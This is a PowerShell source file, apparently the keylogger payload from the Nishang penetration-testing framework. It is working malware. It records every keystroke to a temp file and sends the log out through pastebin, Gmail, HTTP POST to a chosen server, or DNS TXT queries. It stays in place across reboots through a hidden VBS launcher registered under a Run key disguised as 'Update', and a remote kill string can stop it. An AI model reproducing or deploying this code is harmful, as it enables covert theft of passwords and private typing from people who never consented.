<# .SYNOPSIS Nishang Payload which logs keys. .DESCRIPTION This payload logs a user's keys and writes them to file key.log (I know its bad :|) in user's temp directory. The keys are than pasted to pastebin|tinypaste|gmail|all as per selection. Saved keys could then be decoded using the Parse_Key script in nishang. .PARAMETER persist Use this parameter to achieve reboot persistence. Different methods of persistence with Admin access and normal user access. .PARAMETER ExfilOption The method you want to use for exfitration of data. Valid options are "gmail","pastebin","WebServer" and "DNS". .PARAMETER dev_key The Unique API key provided by pastebin when you register a free account. Unused for other options .PARAMETER username Username for the pastebin/gmail account where data would be exfiltrated. Unused for other options .PARAMETER password Password for the pastebin/gmail account where data would be exfiltrated. Unused for other options .PARAMETER URL The URL of the webserver where POST requests would be sent. .PARAMETER DomainName The DomainName, whose subdomains would be used for sending TXT queries to. .PARAMETER AuthNS Authoritative Name Server for the domain specified in DomainName .PARAMETER MagicString The string which when found at CheckURL will stop the keylogger. .PARAMETER CheckURL The URL which would contain the MagicString used to stop keylogging. .EXAMPLE PS > .\Keylogger.ps1 The payload will ask for all required options. .EXAMPLE PS > .\Keylogger.ps1 -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -MagicString stopthis Use above when using the payload from non-interactive shells and no exfiltration is required. .EXAMPLE PS > .\Keylogger.ps1 -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -MagicString stopthis -exfil -ExfilOption WebServer -URL http://192.168.254.226/data/catch.php Use above for exfiltration to a webserver which logs POST requests .EXAMPLE PS > .\Keylogger.ps1 -persist Use above for reboot persistence. .LINK http://labofapenetrationtester.com/ https://github.com/samratashok/nishang #> [CmdletBinding(DefaultParameterSetName="noexfil")] Param( [Parameter(Parametersetname="exfil")] [Switch] $persist, [Parameter(Parametersetname="exfil")] [Switch] $exfil, [Parameter(Position = 0, Mandatory = $True, Parametersetname="exfil")] [Parameter(Position = 0, Mandatory = $True, Parametersetname="noexfil")] [String] $CheckURL, [Parameter(Position = 1, Mandatory = $True, Parametersetname="exfil")] [Parameter(Position = 1, Mandatory = $True, Parametersetname="noexfil")] [String] $MagicString, [Parameter(Position = 2, Mandatory = $False, Parametersetname="exfil")] [ValidateSet("gmail","pastebin","WebServer","DNS")] [String] $ExfilOption, [Parameter(Position = 3, Mandatory = $False, Parametersetname="exfil")] [String] $dev_key = "null", [Parameter(Position = 4, Mandatory = $False, Parametersetname="exfil")] [String] $username = "null", [Parameter(Position = 5, Mandatory = $False, Parametersetname="exfil")] [String] $password = "null", [Parameter(Position = 6, Mandatory = $False, Parametersetname="exfil")] [String] $URL = "null", [Parameter(Position = 7, Mandatory = $False, Parametersetname="exfil")] [String] $DomainName = "null", [Parameter(Position = 8, Mandatory = $False, Parametersetname="exfil")] [String] $AuthNS = "null" ) $functions = { function script:Keylogger { Param ( [Parameter(Position = 0, Mandatory = $True)] [String] $MagicString, [Parameter(Position = 1, Mandatory = $True)] [String] $CheckURL ) $signature = @" [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] public static extern short GetAsyncKeyState(int virtualKeyCode); "@ $getKeyState = Add-Type -memberDefinition $signature -name "Newtype" -namespace newnamespace -passThru $check = 0 while ($true) { Start-Sleep -Milliseconds 40 $logged = "" $result="" $shift_state="" $caps_state="" for ($char=1;$char -le 254;$char++) { $vkey = $char $logged = $getKeyState::GetAsyncKeyState($vkey) if ($logged -eq -32767) { if(($vkey -ge 48) -and ($vkey -le 57)) { $left_shift_state = $getKeyState::GetAsyncKeyState(160) $right_shift_state = $getKeyState::GetAsyncKeyState(161) if(($left_shift_state -eq -32768) -or ($right_shift_state -eq -32768)) { $result = "S-" + $vkey } else { $result = $vkey } } elseif(($vkey -ge 64) -and ($vkey -le 90)) { $left_shift_state = $getKeyState::GetAsyncKeyState(160) $right_shift_state = $getKeyState::GetAsyncKeyState(161) $caps_state = [console]::CapsLock if(!(($left_shift_state -eq -32768) -or ($right_shift_state -eq -32768)) -xor $caps_state) { $result = "S-" + $vkey } else { $result = $vkey } } elseif((($vkey -ge 186) -and ($vkey -le 192)) -or (($vkey -ge 219) -and ($vkey -le 222))) { $left_shift_state = $getKeyState::GetAsyncKeyState(160) $right_shift_state = $getKeyState::GetAsyncKeyState(161) if(($left_shift_state -eq -32768) -or ($right_shift_state -eq -32768)) { $result = "S-" + $vkey } else { $result = $vkey } } else { $result = $vkey } $now = Get-Date; $logLine = "$result " $filename = "$env:temp\key.log" Out-File -FilePath $fileName -Append -InputObject "$logLine" } } $check++ if ($check -eq 6000) { $webclient = New-Object System.Net.WebClient $filecontent = $webclient.DownloadString("$CheckURL") if ($filecontent -eq $MagicString) { break } $check = 0 } } } function Keypaste { Param ( [Parameter(Position = 0, Mandatory = $True)] [String] $ExfilOption, [Parameter(Position = 1, Mandatory = $True)] [String] $dev_key, [Parameter(Position = 2, Mandatory = $True)] [String] $username, [Parameter(Position = 3, Mandatory = $True)] [String] $password, [Parameter(Position = 4, Mandatory = $True)] [String] $URL, [Parameter(Position = 5, Mandatory = $True)] [String] $AuthNS, [Parameter(Position = 6, Mandatory = $True)] [String] $MagicString, [Parameter(Position = 7, Mandatory = $True)] [String] $CheckURL ) $check = 0 while($true) { $read = 0 Start-Sleep -Seconds 5 $pastevalue=Get-Content $env:temp\key.log $read++ if ($read -eq 30) { Out-File -FilePath $env:temp\key.log -Force -InputObject " " $read = 0 } $now = Get-Date; $name = $env:COMPUTERNAME $paste_name = $name + " : " + $now.ToUniversalTime().ToString("dd/MM/yyyy HH:mm:ss:fff") function post_http($url,$parameters) { $http_request = New-Object -ComObject Msxml2.XMLHTTP $http_request.open("POST", $url, $false) $http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded") $http_request.setRequestHeader("Content-length", $parameters.length); $http_request.setRequestHeader("Connection", "close") $http_request.send($parameters) $script:session_key=$http_request.responseText } function Compress-Encode { #Compression logic from http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html $ms = New-Object IO.MemoryStream $action = [IO.Compression.CompressionMode]::Compress $cs = New-Object IO.Compression.DeflateStream ($ms,$action) $sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII) $pastevalue | ForEach-Object {$sw.WriteLine($_)} $sw.Close() # Base64 encode stream $code = [Convert]::ToBase64String($ms.ToArray()) return $code } if ($exfiloption -eq "pastebin") { $utfbytes = [System.Text.Encoding]::UTF8.GetBytes($Data) $pastevalue = [System.Convert]::ToBase64String($utfbytes) post_http "https://pastebin.com/api/api_login.php" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password" post_http "https://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2" } elseif ($exfiloption -eq "gmail") { #http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage $smtpserver = "smtp.gmail.com" $msg = new-object Net.Mail.MailMessage $smtp = new-object Net.Mail.SmtpClient($smtpServer ) $smtp.EnableSsl = $True $smtp.Credentials = New-Object System.Net.NetworkCredential("$username", "$password"); $msg.From = "$username@gmail.com" $msg.To.Add("$username@gmail.com") $msg.Subject = $pastename $msg.Body = $pastevalue if ($filename) { $att = new-object Net.Mail.Attachment($filename) $msg.Attachments.Add($att) } $smtp.Send($msg) } elseif ($exfiloption -eq "webserver") { $Data = Compress-Encode post_http $URL $Data } elseif ($ExfilOption -eq "DNS") { $lengthofsubstr = 0 $code = Compress-Encode $queries = [int]($code.Length/63) while ($queries -ne 0) { $querystring = $code.Substring($lengthofsubstr,63) Invoke-Expression "nslookup -querytype=txt $querystring.$DomainName $ExfilNS" $lengthofsubstr += 63 $queries -= 1 } $mod = $code.Length%63 $query = $code.Substring($code.Length - $mod, $mod) Invoke-Expression "nslookup -querytype=txt $query.$DomainName $ExfilNS" } $check++ if ($check -eq 6000) { $check = 0 $webclient = New-Object System.Net.WebClient $filecontent = $webclient.DownloadString("$CheckURL") if ($filecontent -eq $MagicString) { break } } } } } $modulename = $script:MyInvocation.MyCommand.Name if($persist -eq $True) { $name = "persist.vbs" $options = "start-job -InitializationScript `$functions -scriptblock {Keypaste $args[0] $args[1] $args[2] $args[3] $args[4] $args[5] $args[6] $args[7]} -ArgumentList @($ExfilOption,$dev_key,$username,$password,$URL,$AuthNS,$MagicString,$CheckURL)" $options2 = "start-job -InitializationScript `$functions -scriptblock {Keylogger $args[0] $args[1]} -ArgumentList @($MagicString,$CheckURL)" $func = $functions.Tostring() Out-File -InputObject '$functions = {' -Force $env:TEMP\$modulename Out-File -InputObject $func -Append $env:TEMP\$modulename Out-File -InputObject '}' -Append -NoClobber $env:TEMP\$modulename Out-File -InputObject $options -Append -NoClobber $env:TEMP\$modulename Out-File -InputObject $options2 -Append -NoClobber $env:TEMP\$modulename New-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update -PropertyType String -Value $env:TEMP\$name -force echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name echo "objShell.run(`"powershell -noexit -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name } else { if ($exfil -eq $True) { start-job -InitializationScript $functions -scriptblock {Keypaste $args[0] $args[1] $args[2] $args[3] $args[4] $args[5] $args[6] $args[7]} -ArgumentList @($ExfilOption,$dev_key,$username,$password,$URL,$AuthNS,$MagicString,$CheckURL) start-job -InitializationScript $functions -scriptblock {Keylogger $args[0] $args[1]} -ArgumentList @($MagicString,$CheckURL) } else { start-job -InitializationScript $functions -scriptblock {Keylogger $args[0] $args[1]} -ArgumentList @($MagicString,$CheckURL) } }